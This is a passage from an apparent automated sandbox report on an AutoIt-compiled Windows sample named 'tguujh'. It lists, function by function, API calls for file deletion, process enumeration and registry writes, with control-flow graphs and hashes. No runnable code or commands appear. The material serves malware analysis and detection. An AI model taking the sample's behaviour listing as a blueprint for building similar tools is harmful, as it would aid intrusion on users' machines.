                                                                • Part of subcall function 00CBDA5C: CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,00CBD9DC,?,?), ref: 00CBDA72
                                                              • FindClose.KERNEL32(00000000,?,?,?), ref: 00CBDA13
                                                              • FindClose.KERNEL32(00000000), ref: 00CBDA24
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                              • String ID: \*.*
                                                              • API String ID: 1946585618-1173974218
                                                              • Opcode ID: ee8405dda92091c72755cc15c11efc454b759e16aeb986150a6ce3aca5a69cc9
                                                              • Instruction ID: 738817eb7cb4e3e22e2012fab6f0e77359d3bf32187e417614431b1da88232e8
                                                              • Opcode Fuzzy Hash: ee8405dda92091c72755cc15c11efc454b759e16aeb986150a6ce3aca5a69cc9
                                                              • Instruction Fuzzy Hash: DE616B35C0114DABCF05EBE0DA92AEDBBB5AF14301F644165E812B71A2EB315F4DEB60
                                                              Function 00CBDB69 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00C5557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C55558,?,?,00C94B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C5559E
                                                                • Part of subcall function 00CBE9C5: GetFileAttributesW.KERNELBASE(?,00CBD755), ref: 00CBE9C6
                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00CBDBE0
                                                              • DeleteFileW.KERNELBASE(?,?,?,?), ref: 00CBDC30
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CBDC41
                                                              • FindClose.KERNEL32(00000000), ref: 00CBDC58
                                                              • FindClose.KERNEL32(00000000), ref: 00CBDC61
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                              • String ID: \*.*
                                                              • API String ID: 2649000838-1173974218
                                                              • Opcode ID: 8ef69e3fba8225be771eeb8bb436da732f0a9dfa5b42283699cd77366bec5712
                                                              • Instruction ID: 389d47f5c689da95fbe45d2cea8463c6cc2749e47541d3f40061610e54e83d43
                                                              • Opcode Fuzzy Hash: 8ef69e3fba8225be771eeb8bb436da732f0a9dfa5b42283699cd77366bec5712
                                                              • Instruction Fuzzy Hash: EB316F350083859BC701EB64D8919EFBBE8BE91301F444A1DF8E2871A1EB60DE4DDB66
                                                              Function 00CBDC9C Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00CBDCC1
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00CBDCCF
                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00CBDCEF
                                                              • CloseHandle.KERNELBASE(00000000), ref: 00CBDD9C
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 420147892-0
                                                              • Opcode ID: 6976024c64795b8add4795a789ee7d2bb3ad679fe0f3e9a7df46037741690c46
                                                              • Instruction ID: f6724183f81e8e17cee617c0671c7de8fd17760fe90ef69956880569f685466c
                                                              • Opcode Fuzzy Hash: 6976024c64795b8add4795a789ee7d2bb3ad679fe0f3e9a7df46037741690c46
                                                              • Instruction Fuzzy Hash: C13193751083449FC301EF60DC85BAFBBF8AF99350F04092DF582861A1EB719A89DB92
                                                              Function 00CBE387 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,00C94686), ref: 00CBE397
                                                              • GetFileAttributesW.KERNELBASE(?), ref: 00CBE3A6
                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00CBE3B7
                                                              • FindClose.KERNEL32(00000000), ref: 00CBE3C3
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: FileFind$AttributesCloseFirstlstrlen
                                                              • String ID:
                                                              • API String ID: 2695905019-0
                                                              • Opcode ID: 40e8843085a4f500ad4bf7437a3a2806c191bb9989f27d48b5a2075b6655c683
                                                              • Instruction ID: 7b63e39933f1dc88f3a01f7d85994d2c5e8d154dce39fb67cd566f6aaca3e90e
                                                              • Opcode Fuzzy Hash: 40e8843085a4f500ad4bf7437a3a2806c191bb9989f27d48b5a2075b6655c683
                                                              • Instruction Fuzzy Hash: BFF0E530411A206BC211673CAC8D9EE77ED9E41335F104711F936C71F0D7B0DE954695
                                                              Function 00C75078 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?,00C7504E,?,00D198D8,0000000C,00C751A5,?,00000002,00000000), ref: 00C75099
                                                              • TerminateProcess.KERNEL32(00000000,?,00C7504E,?,00D198D8,0000000C,00C751A5,?,00000002,00000000), ref: 00C750A0
                                                              • ExitProcess.KERNEL32 ref: 00C750B2
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: b076ad624402c2826558ec8adb87e9a3cd2a070bb8962a0b246ecedf1960bd3c
                                                              • Instruction ID: c38d957fda906a0ba4f53552d3efccf365a4b1d12ece046f3a613d869c0869d9
                                                              • Opcode Fuzzy Hash: b076ad624402c2826558ec8adb87e9a3cd2a070bb8962a0b246ecedf1960bd3c
                                                              • Instruction Fuzzy Hash: 0EE0B635400588AFCF216F54DE49F5C3B79FB40791F008014F81A8A132DB76EE42DB90
                                                              Function 00CAE5F8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetUserNameW.ADVAPI32(?,?), ref: 00CAE60A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: NameUser
                                                              • String ID: X64
                                                              • API String ID: 2645101109-893830106
                                                              • Opcode ID: 67b2421fc47b56e957611a9f455ec581bf5867a2bddd38a36fd7ff232db204fd
                                                              • Instruction ID: 3c16c6f36a58a119038097fd6a60c88e8e3693dae33b33e2896fb663439d4f63
                                                              • Opcode Fuzzy Hash: 67b2421fc47b56e957611a9f455ec581bf5867a2bddd38a36fd7ff232db204fd
                                                              • Instruction Fuzzy Hash: 4DD0C9B480511DEACBA0CBA0DCC8EDD777CBB14304F104552F106A2040DB3095488B50
                                                              Function 00CDCD16 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 cdcd16-cdcd5a call c5bf07 * 3 7 cdcd5c-cdcd5f 0->7 8 cdcd65-cdcdd8 call c58e70 call cdd6b1 call cdd2f7 0->8 7->8 9 cdce64-cdce71 call c5e650 7->9 22 cdce08-cdce0d 8->22 23 cdcdda-cdcde8 8->23 15 cdd1ef-cdd212 call c5bd2c * 3 9->15 27 cdce7c 22->27 28 cdce0f-cdce24 RegConnectRegistryW 22->28 24 cdcded-cdcdfd 23->24 25 cdcdea 23->25 29 cdcdff 24->29 30 cdce02-cdce06 24->30 25->24 31 cdce80-cdceab RegCreateKeyExW 27->31 33 cdce76-cdce7a 28->33 34 cdce26-cdce43 call c57ab0 28->34 29->30 35 cdce61-cdce63 30->35 36 cdcead-cdceca call c57ab0 31->36 37 cdcf0e-cdcf13 31->37 33->31 46 cdce48-cdce58 34->46 47 cdce45 34->47 35->9 50 cdcecc 36->50 51 cdcecf-cdcede 36->51 42 cdcf19-cdcf42 call c58e70 call c74db8 37->42 43 cdd1d6-cdd1e7 RegCloseKey 37->43 59 cdcf44-cdcf91 call c58e70 call c74cf3 call c58e70 * 2 42->59 60 cdcf96-cdcfb9 call c58e70 call c74db8 42->60 43->15 48 cdd1e9-cdd1ed RegCloseKey 43->48 52 cdce5d 46->52 53 cdce5a 46->53 47->46 48->15 50->51 55 cdcee0 51->55 56 cdcee3-cdcef9 call c5e650 51->56 52->35 53->52 55->56 56->15 63 cdceff-cdcf09 RegCloseKey 56->63 85 cdd2bb-cdd2c7 RegSetValueExW 59->85 71 cdcfbf-cdd019 call c58e70 call c74cf3 call c58e70 * 2 RegSetValueExW 60->71 72 cdd047-cdd06a call c58e70 call c74db8 60->72 63->15 71->43 105 cdd01f-cdd042 call c57ab0 call c5e650 71->105 86 cdd156-cdd179 call c58e70 call c74db8 72->86 87 cdd070-cdd0d6 call c58e70 call c7019b call c58e70 call c5605e 72->87 85->43 89 cdd2cd-cdd2f2 call c57ab0 call c5e650 85->89 106 cdd17f-cdd19f call c5c92d call c58e70 86->106 107 cdd215-cdd238 call c58e70 call c74db8 86->107 124 cdd0d8-cdd0dd 87->124 125 cdd0f6-cdd128 call c58e70 RegSetValueExW 87->125 89->43 105->43 127 cdd1a1-cdd1b4 RegSetValueExW 106->127 128 cdd23a-cdd260 call c5c5df call c58e70 107->128 129 cdd265-cdd282 call c58e70 call c74db8 107->129 130 cdd0df-cdd0e1 124->130 131 cdd0e5-cdd0e8 124->131 139 cdd14a-cdd151 call c701a4 125->139 140 cdd12a-cdd143 call c57ab0 call c5e650 125->140 127->43 135 cdd1b6-cdd1c0 call c57ab0 127->135 128->127 145 cdd1c5-cdd1cf call c5e650 129->145 153 cdd288-cdd2b9 call cc276a call c58e70 call cc27da 129->153 130->131 131->124 132 cdd0ea-cdd0ec 131->132 132->125 137 cdd0ee-cdd0f2 132->137 135->145 137->125 139->43 140->139 145->43 153->85
                                                              APIs
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CDCE1C
                                                              • RegCreateKeyExW.KERNELBASE(?,?,00000000,00CEDCD0,00000000,?,00000000,?,?), ref: 00CDCEA3
                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00CDCF03
                                                              • _wcslen.LIBCMT ref: 00CDCF53
                                                              • _wcslen.LIBCMT ref: 00CDCFCE
                                                              • RegSetValueExW.KERNELBASE(00000001,?,00000000,00000001,?,?), ref: 00CDD011
                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00CDD120
                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00CDD1AC
                                                              • RegCloseKey.KERNELBASE(?), ref: 00CDD1E0
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00CDD1ED
                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00CDD2BF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                              • API String ID: 9721498-966354055
                                                              • Opcode ID: 15203115f868c6321c163375ed8b73a94c91790ad7eac5fb1eb63ae579eaeac4
                                                              • Instruction ID: 7f5a562f4e2c182f370751514fb07b4ca136945e4191744144e9c9a89ee1ec7d
                                                              • Opcode Fuzzy Hash: 15203115f868c6321c163375ed8b73a94c91790ad7eac5fb1eb63ae579eaeac4
                                                              • Instruction Fuzzy Hash: 231268396042019FCB14DF24C881B2AB7E5FF88724F04845DF99A9B3A2CB71ED85DB85
                                                              Function 00C53E15 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 163 c53e15-c53e45 call c7019b call c7016b 168 c53e47-c53e49 163->168 169 c53e6e-c53e80 call c7919b 163->169 171 c53e4a-c53e50 168->171 169->171 176 c53e82-c53e94 call c7919b 169->176 173 c53e65-c53e6b 171->173 174 c53e52-c53e62 call c7015d call c701a4 171->174 174->173 182 c94585-c94587 176->182 183 c53e9a-c53eac call c7919b 176->183 182->171 186 c9458c-c9458f 183->186 187 c53eb2-c53ec4 call c7919b 183->187 186->171 190 c94594-c945cb call c54154 call c54093 call c53fb8 call c74cf3 187->190 191 c53eca-c53edc call c7919b 187->191 223 c94608-c9460b 190->223 224 c945cd-c945d8 190->224 196 c9462e-c94633 191->196 197 c53ee2-c53ef4 call c7919b 191->197 196->171 201 c94639-c94655 call c6e2e5 196->201 206 c94677-c94688 call cba316 197->206 207 c53efa-c53f0c call c7919b 197->207 209 c94662-c9466a 201->209 210 c94657-c9465b 201->210 219 c9468a-c946d2 call c5b25f * 2 call c55379 call c53aa3 call c5bd2c * 2 206->219 220 c946dc-c946e2 206->220 221 c53f26 207->221 222 c53f0e-c53f20 call c7919b 207->222 209->171 215 c94670 209->215 210->201 214 c9465d 210->214 214->171 215->206 242 c94704-c94706 219->242 268 c946d4-c946d7 219->268 226 c946f5-c946ff call cba12a 220->226 231 c53f29-c53f2e call c5ad74 221->231 222->171 222->221 227 c9460d-c9461b 223->227 228 c945f6-c94603 call c701a4 223->228 224->223 225 c945da-c945e1 224->225 225->228 232 c945e3-c945e7 225->232 226->242 241 c94620-c94629 call c701a4 227->241 228->226 238 c53f33-c53f35 231->238 232->228 239 c945e9-c945f4 232->239 244 c946e4-c946e9 238->244 245 c53f3b-c53f5e call c53fb8 call c54093 call c7919b 238->245 239->241 241->171 242->171 244->171 250 c946ef-c946f0 244->250 264 c53fb0-c53fb3 245->264 265 c53f60-c53f72 call c7919b 245->265 250->226 264->231 265->264 270 c53f74-c53f86 call c7919b 265->270 268->171 273 c53f9c-c53fa5 270->273 274 c53f88-c53f9a call c7919b 270->274 273->171 275 c53fab 273->275 274->231 274->273 275->231
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                              • API String ID: 0-1645009161
                                                              • Opcode ID: 8e166793d3065290b1d6cf40f3f4c14e41d31b8deb0baf348f36199ac1f678c7
                                                              • Instruction ID: 71a62e4abab3eedbcf1de2cfa974e750f5db115a95aa4a5922daa05c2e125077
                                                              • Opcode Fuzzy Hash: 8e166793d3065290b1d6cf40f3f4c14e41d31b8deb0baf348f36199ac1f678c7
                                                              • Instruction Fuzzy Hash: 2D811771A40245BBDF15AF61DC47FAE3BA8EF05741F004020FD099A192EB70DB9AE759
                                                              Function 00C5EE0B Relevance: 21.6, APIs: 14, Instructions: 609windowsleeptimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetInputState.USER32 ref: 00C5EEB7
                                                              • timeGetTime.WINMM ref: 00C5F0B7
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C5F1D8
                                                              • TranslateMessage.USER32(?), ref: 00C5F22B
                                                              • DispatchMessageW.USER32(?), ref: 00C5F239
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C5F24F
                                                              • Sleep.KERNELBASE(0000000A), ref: 00C5F261
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                              • String ID:
                                                              • API String ID: 2189390790-0
                                                              • Opcode ID: 96fcd859d40ea8efc3d52ca0eae1b0fe039579221a5d0a0a6a44e08fa527dd68
                                                              • Instruction ID: 72a1de4d3ab25d19a94a8820f32751fe10a3066b9e3b00e6e3b44b05d10692a3
                                                              • Opcode Fuzzy Hash: 96fcd859d40ea8efc3d52ca0eae1b0fe039579221a5d0a0a6a44e08fa527dd68
                                                              • Instruction Fuzzy Hash: 8B320474604382EFD728CF24C884B6EB7E0BF92305F14452DF96587291C771EA89DB96
                                                              Function 00C535AB Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00C535DE
                                                              • RegisterClassExW.USER32(00000030), ref: 00C53608
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C53619
                                                              • InitCommonControlsEx.COMCTL32(?), ref: 00C53636
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C53646
                                                              • LoadIconW.USER32(000000A9), ref: 00C5365C
                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C5366B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                              • API String ID: 2914291525-1005189915
                                                              • Opcode ID: 11303b8c1d8f58b4f755dbd6e55445d711b64e0e72c4814fbcf87981a8e0ad46
                                                              • Instruction ID: 83ec6ceda8689ffa8032ebda80b99d720ba785b79f7a845c8b2ba2ef97d34c1c
                                                              • Opcode Fuzzy Hash: 11303b8c1d8f58b4f755dbd6e55445d711b64e0e72c4814fbcf87981a8e0ad46
                                                              • Instruction Fuzzy Hash: 7C21E5B5941348AFDB10DF94EC89BAD7BB4FB08710F00411AF512EA2A0D7B55685CFA0
                                                              Function 00C909FB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 678 c909fb-c90a2b call c907cf 681 c90a2d-c90a38 call c7f656 678->681 682 c90a46-c90a52 call c855b1 678->682 687 c90a3a-c90a41 call c7f669 681->687 688 c90a6b-c90ab4 call c9073a 682->688 689 c90a54-c90a69 call c7f656 call c7f669 682->689 699 c90d1d-c90d23 687->699 697 c90b21-c90b2a GetFileType 688->697 698 c90ab6-c90abf 688->698 689->687 703 c90b2c-c90b5d GetLastError call c7f633 CloseHandle 697->703 704 c90b73-c90b76 697->704 701 c90ac1-c90ac5 698->701 702 c90af6-c90b1c GetLastError call c7f633 698->702 701->702 707 c90ac7-c90af4 call c9073a 701->707 702->687 703->687 715 c90b63-c90b6e call c7f669 703->715 705 c90b78-c90b7d 704->705 706 c90b7f-c90b85 704->706 711 c90b89-c90bd7 call c854fa 705->711 706->711 712 c90b87 706->712 707->697 707->702 721 c90bd9-c90be5 call c9094b 711->721 722 c90be7-c90c0b call c904ed 711->722 712->711 715->687 721->722 729 c90c0f-c90c19 call c88a3e 721->729 727 c90c0d 722->727 728 c90c1e-c90c61 722->728 727->729 731 c90c63-c90c67 728->731 732 c90c82-c90c90 728->732 729->699 731->732 734 c90c69-c90c7d 731->734 735 c90d1b 732->735 736 c90c96-c90c9a 732->736 734->732 735->699 736->735 737 c90c9c-c90ccf CloseHandle call c9073a 736->737 740 c90cd1-c90cfd GetLastError call c7f633 call c856c3 737->740 741 c90d03-c90d17 737->741 740->741 741->735
                                                              APIs
                                                                • Part of subcall function 00C9073A: CreateFileW.KERNELBASE(00000000,00000000,?,00C90AA4,?,?,00000000,?,00C90AA4,00000000,0000000C), ref: 00C90757
                                                              • GetLastError.KERNEL32 ref: 00C90B0F
                                                              • __dosmaperr.LIBCMT ref: 00C90B16
                                                              • GetFileType.KERNELBASE(00000000), ref: 00C90B22
                                                              • GetLastError.KERNEL32 ref: 00C90B2C
                                                              • __dosmaperr.LIBCMT ref: 00C90B35
                                                              • CloseHandle.KERNEL32(00000000), ref: 00C90B55
                                                              • CloseHandle.KERNEL32(?), ref: 00C90C9F
                                                              • GetLastError.KERNEL32 ref: 00C90CD1
                                                              • __dosmaperr.LIBCMT ref: 00C90CD8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                              • String ID: H
                                                              • API String ID: 4237864984-2852464175
                                                              • Opcode ID: ea573d0c32ea21a2ab89461e01cd5ff56e2efed7b2a9663d8eaaac2d92e4cf8c
                                                              • Instruction ID: 50c0f94c6028fbdd1e86f46de1e9722d3a3b554583bca611211e75013c3b3239
                                                              • Opcode Fuzzy Hash: ea573d0c32ea21a2ab89461e01cd5ff56e2efed7b2a9663d8eaaac2d92e4cf8c
                                                              • Instruction Fuzzy Hash: C8A12732A042448FDF19AF68D896BAD3BA0EF16324F24415DF821DB3A1DB319913DB51
                                                              Function 00C5522E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
